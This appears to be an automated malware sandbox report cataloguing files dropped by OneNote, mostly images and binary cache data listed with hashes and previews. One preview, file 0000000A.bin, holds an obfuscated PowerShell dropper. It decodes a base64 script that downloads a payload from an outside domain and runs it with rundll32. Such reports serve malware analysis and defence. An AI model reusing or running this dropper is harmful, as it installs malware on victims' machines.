SSDEEP:	192:osrQz7y4GvpwOoRcFYa6yJDTGTkB5saLt44ZRcIYI7S++InTJ2Fn:Pw7yxqbRPyThZRl
MD5:	A6DCAEB46BB867B3FCA70B5FECD72FA9
SHA1:	6B289B339EFE821CE93F1D359010D2BDD9012B17
SHA-256:	FB5A421D3552ECD41AD67607C34149EC3CDB6ADF9072D40C88A77DDB18F4403C
SHA-512:	A9098E3BB2947231C604B8CD9482BD55A092441577E080DD0D2027F0C0BB93513949B10263A35C2E3138A9C6636ECE244B25AA7E20B45B41145F731F642CF21F
Malicious:	false
Preview:	r...........&...*...p...P....,..................>..@....@...@..................................................................................................?....................................^.......................>....I.qk..B.....LZ.............Yg....E...~.............Yg....E...~............].x..k............K.......K.......K...........................................k.......k.......k...e...k.......k..>0...K...r...K. .,...K...R.......Z4...................4../4..04..............................p...........................C.a.l.i.b.r.i...........K...z... ..$............................M0.Q...........C...?......@?..@?...PA...?...A...A.............".K.#.K...z...,4. ...........$.4..V/.Q............K...K...K...K...z...y.. x.. ...........$... ./.Q./.Q............k...z...;............4...4..?.. ...................................."...a....5...5.....Q..........5.7.K.<.O.=.=.K.9. .@.8.A.C.=.>.:...p.n.g..........A...@..pA..@.....".@0.<?................z..O......MV.-x}.K.......P........

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000007.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 40 x 40, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1354
Entropy (8bit):	7.799120546917745
Encrypted:	false
SSDEEP:	24:AXFMpSCdmi2MTbWm/8T368Bf50D+1vDD9BFGBsQ5SOryjJ4w6++mPKc82UGOpIUg:AO4m122bQ36gfaS1rDw2QsOryjJ4xLml
MD5:	C2BF462C1311A92660999498F29394BD
SHA1:	4BD7C156F172C1114F33D80BAB05252C9F8E87C0
SHA-256:	5E0A8F7D863DAD057AC91FB888CFA7BE1D30A6CF65A908CE90081C323A0858B7
SHA-512:	1107117B3C4B843E5EB32CB13C5CA91E28857DDAE18A197F471D9FCA5B767C7441661FC3A21D2B6FF3C6EB91048A93598E1D86EA55A60A427D8E4B82E59A30C9
Malicious:	false
Preview:	.PNG........IHDR...(...(........m....sRGB.........pHYs...t...t..f.x....IDATXG..O.W....`...c.C..`.H(!@.[Q..B.D......Q..}.C...}.CTU.MR.j...[.....".x.B.x.wG.2$xf.J..W..g....}w.H.....b* ...../.V_\|.....TC]-.d......\\Z..l......>..D....G.....}.]}.x...X...WZ....?.-..A..&x...Q$)U..../.w...?..!8IE..:.....6..y.z..Yg.`g.@(...z...VS..$@..q2.,."....RT.}..%..q.lA0....[m.................2...8..a.LJ....n......M.%x......\...$g.Y.p.Q^U....$;.r.....>...>...]..$...r..bz.P.(....}:&'ldc...c\|.bs.>z.:?.M....(.SR..a..o..=2....i#..{......y.)....}.1_ .....T@O..F..d....Piu.TQA....#DY.S&G....j....3z..>zL..:...33...C&.S....h...LQk. ...hRSy&m..?...d.....l.].G...BL.-..N;.....s.0Q....T.(0...p....HU..d.V..z.)..2. ..........d...x.{......2.zdP.....;.?aeu......(..,#.....nj.... ....0.X..dr.T)x...4.V...]p8].p.PH.4f{.n.....x.........Z...O>DF.)^.Y.....p.Zf..1e.a.>."fm{.=hui...Fnn.T......./''...U<.,f'........:Y......ckk..RN.....f.omf..rZi.\..h.....\|.4.,/......=.z%.F....Z...>..A.....?.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000008.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\00000009.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	GIF image data, version 89a, 1012 x 327
Category:	dropped
Size (bytes):	11765
Entropy (8bit):	7.911655818336033
Encrypted:	false
SSDEEP:	192:aUpmR1MS7mEuHIgBEoe/nOdV8EHi+rBJZ2M6qhH03NMWjvD5ZktcatNy+AT3jCOj:aUOVTi9EoDH8ujBJwMvhU3mgocatgdOm
MD5:	B035F23C68CC9673E604FE5472F223D2
SHA1:	56495B558547AACCE34C65C1D1FCF6C9ECAFCEE1
SHA-256:	F3F791A1303058D4F363E02F0515DE8484249624857CAF5ECE6C926D7324114C
SHA-512:	B6923EC5D91F5C771B65C63A97AB23BC8E6762CA60C31DEE8D1D141703923EDDFC266229B263EA88E10AF89A92C0EF361BF91A3D5CB600AE129C452D94580662
Malicious:	false
Preview:	GIF89a..G.................................................................................................................................................................\|.................................................................................................Y..Z..\.._..a..c..d..f..e..i..k..m..n..p..s..r..v..y..z..}..~....................0..3..5..6..7..9..<..>..@..B..C..E..G..J..N..N..P..R..T..V..[.................................................. ..!..#..#.."..$..&..&..(..)..+..+..,..,.....1..3..4..6..9..;..=..?..B..E..G..I..L..N..O..Q..S..W..Z..]..^..`..a..b..d..g..h..j..m..p..s..u..x..{..\|..~.................................................................................................................................................!.......,......G........H......\....#J.H....3j.... C..I...(S.\...0c.I...8s.....@...J...H.]...P.J.J...X.j....`..K...h.]...p..K...x..........L....N....8q..i.L....3k.....C..M....S.^....

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000A.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	ASCII text, with very long lines (380), with no line terminators
Category:	dropped
Size (bytes):	380
Entropy (8bit):	5.853345406863477
Encrypted:	false
SSDEEP:	6:sKHLgyKBM34HR1KCsu2xKthIYWNgvBSP8A/lKaHoyCRjpm+Rs3FEY9hMS/aXXrZQ:ssLgyaI4HPKC2EwgvBSU6Ij4+RIFE4qg
MD5:	4B1934D97AE633B5C88F3424B4953761
SHA1:	9EADA74C008237311CBA7367A69A9D291ACE70F2
SHA-256:	74B3A5F20FDB37F8F26025E768EDDDCC08568542402033955C97AF6D8E5D61B4
SHA-512:	04980D507ACC647FA732429DCBB71632FB0F410523E56E39C32F0B89ECA342967DFFC4316B97D0881ABC0C1E7AC2D1A8AAC39B33D00EE0763076A1B65FD2FB99
Malicious:	false
Preview:	powershell [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('DQpAZWNobyBvZmYNCnBvd2Vyc2hlbGwgSW52b2tlLVdlYlJlcXVlc3QgLVVSSSBodHRwczovL3N0YXJjb21wdXRhZG9yYXMuY29tL2x0MmVMTTYvMDEuZ2lmIC1PdXRGaWxlIEM6XHByb2dyYW1kYXRhXHB1dHR5LmpwZw0KcnVuZGxsMzIgQzpccHJvZ3JhbWRhdGFccHV0dHkuanBnLFdpbmQNCmV4aXQNCg==')) > C:\ProgramData\in.cmd&&start /min C:\ProgramData\in.cmd

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000B.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	PNG image data, 1692 x 810, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	76485
Entropy (8bit):	7.79809544163696
Encrypted:	false
SSDEEP:	1536:xvY6z54EJ+ytgXIeZCXIokE9Kkf2oY7LLw7wDzKiivL4w1jr8TYEo7s:xgS2EJbyYeMYkKkyX3DWvLLATiY
MD5:	734BA03175EBC8B8E3EF57BC3DDC9D8E
SHA1:	1C0EA89A657A5D157D06EEF8C1BC722BC2CFD918
SHA-256:	275DEEC71606F71DC7F6F81026F797B7F36F3BB2203B4483007BBCA1E4447528
SHA-512:	23EA232051472C3F4F61D81012F989BA54B24180C1353C860BCBBD92C89D2F395BF02786902AA9E0BFF634043A5C5E73CDB743124A8B5ECFBD0D583F28BB0B9F
Malicious:	false
Preview:	.PNG........IHDR.............v......gAMA......a....IiCCPsRGB IEC61966-2.1..H..SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly\|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D...A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m....... ......O.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000C.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	1.530296884432978
Encrypted:	false
SSDEEP:	24:8hs4scFkkchkl6zh4x29gVYeGt/yVYeGtLeGpYeGtmyVYYIYeGt9mYeGtmyVY:bLcikchs6zhuMYMhpMLqMDmML
MD5:	908287DC91736793B889BEC9AB307551
SHA1:	8EDD60953626A81A3CC860A1B61CBF699D252D53
SHA-256:	D0BF6057AAC9AA151D732392A435443FA13BF810194405C859EF770C83045772
SHA-512:	E9B1E0292D5CBCF1DC7E1C5772815D776F25A1D5213BB1971FBBA23722EBCF079112F1AC955D6CAA0F6E2B1CE591DF996FD7E8145F0E081BA2C83418F681270D
Malicious:	false
Preview:	2...>...........x.......................................................................................................................................2...>...........x...,...2...>...X.......x........Y.......Y....K..X.H..wn......wn.oO.<K......).wn.oO.<K......).wn...Y....K..X.H...Y...........................wn....................................................................5.............@.Lo..;.................wn............................................................y.O.G.jS..u".....h...N.................Y..H.Y.^..................................................................................Y..H.Y.^...............y.O.G.jS..u"...........Y.......Y...................................................Y...1...Y.X.4.......................................................0...e.............O...f.... ..!;...................4......(...(...........8.....?...............................................................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000D.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	0.8695639387759603
Encrypted:	false
SSDEEP:	6:XaE566eJ2OyeVs2OWMNnn/ll7MHpEDWkeCn1FUYBYWkUlV/sOxNHXpvcE8lQv:X65wIVD5Gl6Hq//1FUYUUletE0
MD5:	48B8524698954D74AC0C20E7094AE418
SHA1:	7707D7A81E51781EA3C8B5F44BD151ADCF1DB941
SHA-256:	7BF44A6FF3D8282E4D20BF0F2094F7D851A5CBB865BCAE1184C8EFFF267C5F52
SHA-512:	A9C994DEF1D0A2DEC8ACB5D6AA0B99CE7662E8D5730D0C48CBA15DAB0FFE3D0E104739523BD9C329B04608B061352686C061CFFDC30FED938C229BCD3133CDFB
Malicious:	false
Preview:	2...>...........x................................................................................................................................................................................................F...@.7e...2s.......\..(I.....3....F...@.7e...2s....\..(I.....3.................................................................................................5.............@.Lo..;.............................................................................../C...$^gA....h...N.................z.u-.E......................................................................................z.u-.E...................../C...$^gA.......................................................................6....`.1............................................................4..~...1...(...(.......Q.u.i.c.k. .N.o.t.e.s.......Q.u.i.c.k. .N.o.t.e.s...........1.......Q.u.i.c.k. .N.o.t.e.s.............................................................................................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000E.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	4096
Entropy (8bit):	4.546769531558957
Encrypted:	false
SSDEEP:	48:mJcZgDM5axz3Lj6yxyw0LSOBlkw0Lw4CLFJAwEwLWfmAqg0A:mJFD4axjSyxyLBgLM4CJJdEwuPq
MD5:	BEFD02BDEC78C68AC62ACA8D6AD44CCB
SHA1:	E8713B2AC26FF4BEC473AAC6E39BB7DDA1646B2D
SHA-256:	7A01E744C2FA67051218AB57C5C34D0D3FB47A7B5A6533E941504CF5B1D40B4C
SHA-512:	AC7D7DD03163651E2DB897602D1A39FDCCF3C039A16C5268CF9B0BE810D936A3DDBED9E6DC8137AA891A15E04C1DFE38715499D7D4A8D45B60B09A668DD1A74A
Malicious:	false
Preview:	j......@0.......................................................................?.......................................................................j......@h.......................................2.......2..(xSdF.....B..8.......8f.@..).R.u.j..p..xe..2.ZNj....p.....L....,.N.........<....&....!...........................................................................f.......f..NqJ.R.T.h2..P.......P.D.v>I......_.2.......^... ...................2.....8...f..P...p...............2..T%q..L..T.N....fT&....NoT$....P.T.7.......2.......".......l.......P........8..c..,0...e...B4.$..........C@RQ.H..B......Y....................L...n:/D...@M.E.L....Non.*\F...gP. .No.2..(xSdF.....B2.......>..................<....&....!...8f.@..).R.u.j^2..(xSdF.....B}V......}V..n.......p..p.......p..xe..2.ZNj........2........p...c..,0...e...B4.$...........I...M.....0...............................0...........e....4..................T.i.t.l.e.......\|{....B.l...R......(....Y......(...D...L.e.c.t.u.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000F.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	4.634723015448128
Encrypted:	false
SSDEEP:	192:Wsf6Y9gL6yD9o1D0JmnecfmPXFkqRiNg:z/05Ro1Di4uf+qRi
MD5:	9849AFEC83423A775A6AF13E12591F3B
SHA1:	4A396A7A5129C46B49D680BD7BA3D65A428C185A
SHA-256:	015CD7D65A4173A4A2F1034E53C7F58743327015D1F1C2E9B15F51D222BDBA7C
SHA-512:	DAA25E918282E68E5A361934E487DA0E8B660EC6AF2BFB2B0C33286D954485B90A7676903516BA1ADBBC5C292CA071ED638DDDEE420A02C483178F7761EEA117
Malicious:	false
Preview:	2...>.......D...v...8...................................................................................................................................2...>... .......v...l............................I.......I.qk..B.....LZ..U.4.....U".....{..<....U".....{..<....U..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................,=...Y......N...^.................I..&K.....#............@f....................................I.qk..B.....LZ....................,=...Y..................,=...Y.............U.......U.......U...........................................Uj......UT%.....U.......U..7....UH......U ......U$......U..~...............;........4...4...4...............U:..UY..UZ..U..z...y.. x.. ...........$........&..$...7...7........o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.7....................H..U..z... ..$......................

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000G.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	40884
Entropy (8bit):	7.545929039957292
Encrypted:	false
SSDEEP:	768:MCBOA4d+ElOXJ/3pI7cRBiL7L6qERqGz65WXzZqJsKQSbIsTT6XB:hIAU+2cGdLX6qBG4WDZl4Ihx
MD5:	7379775A1E2AB7FAB95CFFCE01AE05F3
SHA1:	3D3DDFD8AC7E07203561BAE423D66F0806833AB3
SHA-256:	9301DB6D2D87282FCEE450189AEACE16D85F64273BF62713A3044992B6B7A9E9
SHA-512:	4B5006E620E80D3A146944649CF4CA619782CAD7E8C4CD0D1DE0EBCA0FA05EACB7378DAFCEED3E26F5698B07F19604614D906C8F51F898660E2F129D8DEC6F62
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!.1A.....Qaq....".....2....BR#S..br...3T...C$.7(Hx....4D.G..Xh.cs..'..t...%...8.....................1...!AQ..a...q"2.4Tt.......R3S....Br...#s...Uu.bc.de..$D..6..C%E..............?...z...;sB.yv...........]t.\...n...../....m....M.=.3G+..x+.....S).*&.J../..8..O/+..sG...p...<!....~.c..C.w..,[oHom.wc-.J.~.......L[..6...'..i_..S;...!Y.z.q].EK..M.x...i.x.+.;.+...}....#......f.)........e6V..p.;........s.)..Ml.J......IU.6...<9+9.^..l..Y...[._...2..^..j.ia...._..3.;...~..<3...;......z.^.......]..Qk.,...Yk...3.3Jy^p.}....q...I...&..t.......;..9.g.GH;..'...%...)..[..y..../...zCn..>...'...1e.Y..;....]..7...N>t..m-.j.............H^..T\.q.ru...}...eTn]I'r.^].#..wOY....v

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000H.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.411312172141092
Encrypted:	false
SSDEEP:	192:cEsq9UkjDd8LMOk5oodVOkylqiU2cXEkkRk7RkKbWVJWVTBkJNT9TQc+xmWV8KxP:cZgj54Dk/7hwqzxjkRk7qKeAuJjkrJ/e
MD5:	634623F5C28AD85042FC7D59BAC8773B
SHA1:	CCEF389A4554F2E66979E75B09ADC63141374D14
SHA-256:	D99549A35E5B4FC92A4002948A74C3D75668318C9355FDBE24F8FD9225FC947C
SHA-512:	BBA72256F9099B615CBFEADFB1F3B3BD005D88AD08BBFCFD20A82ED6A54EA3023CB8D07F329E0AB9842A70BEA9DE1E72D734E13A165BFEB4076AA9CA0BF3FA3D
Malicious:	false
Preview:	2...>...v.......v.......@ ..X)..2...>...2.......v.......@...H(...........................................................................................................................................I.......I.qk..B.....LZ..^.H.....^k....2.Y.`9...^k....2.Y.`9...^..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............6y.~.!..%...)..d....N...^...............a{f.T.E......K.................................................I.qk..B.....LZ............6y.~.!..%...)..d...................................^.......^.......^...........................................^j......^T%a....^..5....^.......^..z....^.......^.......^..M...............;........4...4...4...............^3..^L..^S..^K..^..z...y.. x.. ........ ..$...$........D..........7...7.........*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.1.9....................................;.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000I.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, resolution (DPI), density 72x72, segment length 16, Exif Standard: [TIFF image data, big-endian, direntries=7, orientation=upper-left, xresolution=98, yresolution=106, resolutionunit=2, software=Adobe Photoshop 7.0, datetime=2004:03:04 13:19:29], progressive, precision 8, 221x792, components 3
Category:	dropped
Size (bytes):	24268
Entropy (8bit):	6.946124661664625
Encrypted:	false
SSDEEP:	384:d2wiieoHTRh5a1HAteZCWOZIM+L7WhNjYn:8wHFHJ+/OZIKhNO
MD5:	3CD906D179F59DDFA112510C7E996351
SHA1:	48CDB3685606EDD79D5BCDF0D7267B8B1CCBD5A8
SHA-256:	1591FD26E7FFF5BE97431D0ED3D0ADE5CFC5FA74E3D7EC282FD242160CE68C1F
SHA-512:	2048CBA13AF532FF2BCC7B8B40541993234BD1A8AB6DE47B889AF3F3E4571F9C5A22996D0B1C16DD6603233F6066A1A2A97C16A6020BEDD0826B83BAD0075512
Malicious:	false
Preview:	......JFIF.....H.H......Exif..MM.*.............................b...........j.(...........1.........r.2...........i.................H.......H....Adobe Photoshop 7.0.2004:03:04 13:19:29.....................................................................................(.....................&...................H.......H..........JFIF.....H.H......Adobe_CM......Adobe.d...................................................................................................................................................$.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?.....)......[]t.\Z..g......A....&D.$LH._..X..Xl...`....cZ.X.........>......f.Z.X...]..~L.S..@..I$..I.IO.....x...s.g.[f.h{9..

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000J.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	4.630223912367521
Encrypted:	false
SSDEEP:	192:zs7vfA6gicchjC6VoX16nBEZk5z+jlR9o+InMXO/Xrd9rL+RpD1yCU59eT8XP68k:oc01jE16n0DjrVOvrmRpD1bUDgNSqN
MD5:	0BD77286543F44CCE4759F484A47715D
SHA1:	8E5E60DF040728E70587E9AB2B180CB47A21A6F1
SHA-256:	18AEB754D55591DDB640B7E59AFB513BF62289A00EC9F5E1E915296A7A744277
SHA-512:	4DF3C2602F7C2BAB69C5C9A8838933582B66E2824DC4F868A4DA9805E33D5D7114521A56E4AA430F560042BE9D432A5DBBC4BA2481F9A11A9EFEAA240FFA030B
Malicious:	false
Preview:	2...>...&...j...v...>.... ...,..2...>...........v.......@....+...........................................................................................................................................I.......I.qk..B.....LZ....N.......i..,6.G..&.....i..,6.G..&......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................9m.J..#;.........N...^................."....I..Q.i..<............t....................................I.qk..B.....LZ...............9m.J..#;.....................................................................................................j.......T(................@.......c.......p.....$.\.$...$.................;........4...4...4................3.......z...y.. x.. ...........$...........7...7.....*...o.e.L.o.c.I.D...o.e.L.o.c.C.o.m.m.e.n.t.......0.0.0.6..............z.......R......................7............S.y.m.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000K.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	39010
Entropy (8bit):	7.362726513389497
Encrypted:	false
SSDEEP:	768:6tCjwO+E+KW0ZtOgepcoWW4pAWQ6/KWcR474HOAZaDfK:68j+E+KW0HOgep/72/NKWcRNefK
MD5:	9700DE02720CDB5A45EDE51F1A4647EC
SHA1:	CF72A73E1181719B1CC45C2FE0A6B619081E115E
SHA-256:	7E6A7714A69688D9FFDF16AA942B66064A0C77FCD9B3E469F89730B4B9290C3E
SHA-512:	5438921467D62376472007B9EBF3C35C9D9FE3EDE04D99A990129332D53EBC8EE2555C0319A4F7C0DF63516F29CEDF2171D8B6DC34C9FCD075C2CA41EB728660
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d.........................................................................................!1..A...Qaq..".......2BR#...b%&6..'w.r.3f7W8.s5EUeF.g....CS$4.Vv..Tdt..G..(c..u.Hhx.......................!1.AQa..2.q....".s...3.4BRr.#......b.$c............?........uf.....t...;..[...W.h.....-.k.f..i.u..KQ..b.F...rM%/.8n.S..=9.....G$O;.f.}L..N..U._i.[.X...3.~....S.~..+t$...c.5......{..X/..#.G...}s....6......^....o~.$.\WA?...^*w[O.~..6..~....a....~..:..0.......{O...\|.s.u._w.........i...........{K...._.?.../{.....A..8....<g.iu..<..................X......\|]v....D..9.k.w.\|-IF.Tv.-.&.........."'.4.b....z.._.Z.....G...u.xyt./_.q..m>..S.V.Xdc.bw.T.W......g..........}s.._..?....U]_.......`......>.\|'.~xH....,...?........?.q....o../..R..;...Y.G....A"?......?.<..1...w..o.M.........tco.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000L.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.9048833588552117
Encrypted:	false
SSDEEP:	192:SsydU9/iIOaHw9YxNP2UFquk0eHMuZ8E88VYY07TYfX+Reac904NJ64N2a:fZ/jxHwOzPPAMuZh8GYXvq+Re3
MD5:	4A0E3B83D74F10AB45A7FD390CBB5636
SHA1:	56188F4E38D47EC6B75979EAB3983535673407D9
SHA-256:	E92780D49EE088605C7E266B4FCE554AF28E95BCDD7F955AA442C8169ACFE937
SHA-512:	26B68347EDD6B5CE545E88EB720511C7C4FD66B788D3E37F647FAF44D6AF7D687132CFB6681DC7E678C9ADB328563C73FA20FD11C2E05F26B84BBF8212B0FE2F
Malicious:	false
Preview:	....>......."...v....... ..."......>.......r...v...>...@....!...........................................................................................................................................I.......I.qk..B.....LZ.......................X...,...9.l8..\IX.................^.....I.qk..B.....LZ.I............I.......I...................................................I.t.....I................................................................4..'...'...............)...J....b.Bl)....N...^...............V[....G.{.?..hZ............r...............................z....I.qk..B.....LZ..............)...J....b.Bl)............................................................................................X...8...X...,...9.l8..\I......................^2................................I...............................X..H....X.......X....Y..X.......X.. ....X..$.7..X.......X.. ........X..!X....z...,4. ............................"......$...7...............T.u.e.s.d.a.y.,. .J.u.l.y. .2.8.,.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000M.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	JPEG image data, JFIF standard 1.02, aspect ratio, density 100x100, segment length 16, baseline, precision 8, 612x792, components 3
Category:	dropped
Size (bytes):	59707
Entropy (8bit):	7.858445368171059
Encrypted:	false
SSDEEP:	1536:k76rvGc8WKC2/UX1uEgVRY/jvv9CblyL/T:k77Z5C2/Ow1e9CblCT
MD5:	47ADB0DF6FDA756920225A099B722322
SHA1:	851946B8C2BD0BB351BAEECA9E5BB6648A87D7CA
SHA-256:	EC8CD7250F3D82E900E99114869777EE859EC73EFFABED108815F65742078C3A
SHA-512:	85A9920E1CE4A2FCCEBAFA425C925DF33580FA3C3C00178F058539B2FBC0163866DB8A41B320E2EF2CD217F00FFA06A1A831C728D3F9F910C9EAC58B5DA76E2D
Malicious:	false
Preview:	......JFIF.....d.d......Ducky.......d......Adobe.d...................................................................................................................................................d............................................................................................!1..A..Qaq"....2........B#..R.b3$..8xrC4&'W.%e.(.c.d.5E6Ff..h..SsTt..u...Gg..H.....................!.1..AQ.aq.".......2..st.BR..56.r#3.b.S.4c%...$d.CT............?....3.7...G:../P....z..K.:6..w......6....... .z7...~.....{gdF60...9....{...'[N....m.........z...g{.......7...4..1..=.z...._..p...m..Icd.~.v..9.P..0Z(.<j.......R6zm.....v.z...>x..)=g........zo{..w..f..y.t.....%.D..#.}.I.>).H.QM..cLD..x.../.^y.{.............y.=^.......I.T.......U..0_?...u..og..3.ky..K....6w...Dc......~........ik.z....N...en......_.....x....._u...4.{..P...>.....}.......>.R.....m.....[mt.....}.........\|.....m......~....B.F.]C.36..q....yg...{]...+.DZv.9<.o..;..N.n&im.,....w.3...V.s...Y..e#$.

C:\Users\user\AppData\Local\Microsoft\OneNote\16.0\cache\0000000N.bin (copy)

Download File

Process:	C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
File Type:	data
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	3.8649095102556648
Encrypted:	false
SSDEEP:	192:KLKsaVrMoVUCdDdePD/9JejUyE/X0GPWEVHA1sCWa+WFsao2XdTRlYECu:iaVrdUCjSD1JeWkW4HWa+WFtXdTRlY
MD5:	8A39ADC54F4F8DEEE7C2758DC4AA2229
SHA1:	8B48757E66A427A8444FF0B5AEE589B944CCA036
SHA-256:	279B58B597EB04057CABAD9B4A3DD3D98DE268ED4E1990837370A548384D7EF5
SHA-512:	C8C626758D921BA16385EF8E7665CCA9A7ECEDE5666F8A1ECFD87A1A37A3A80CFBE73E8B171B954FAE53101FA66A7E5ACDE9137DC6473F3724F9F7F3F61D8C11
Malicious:	false
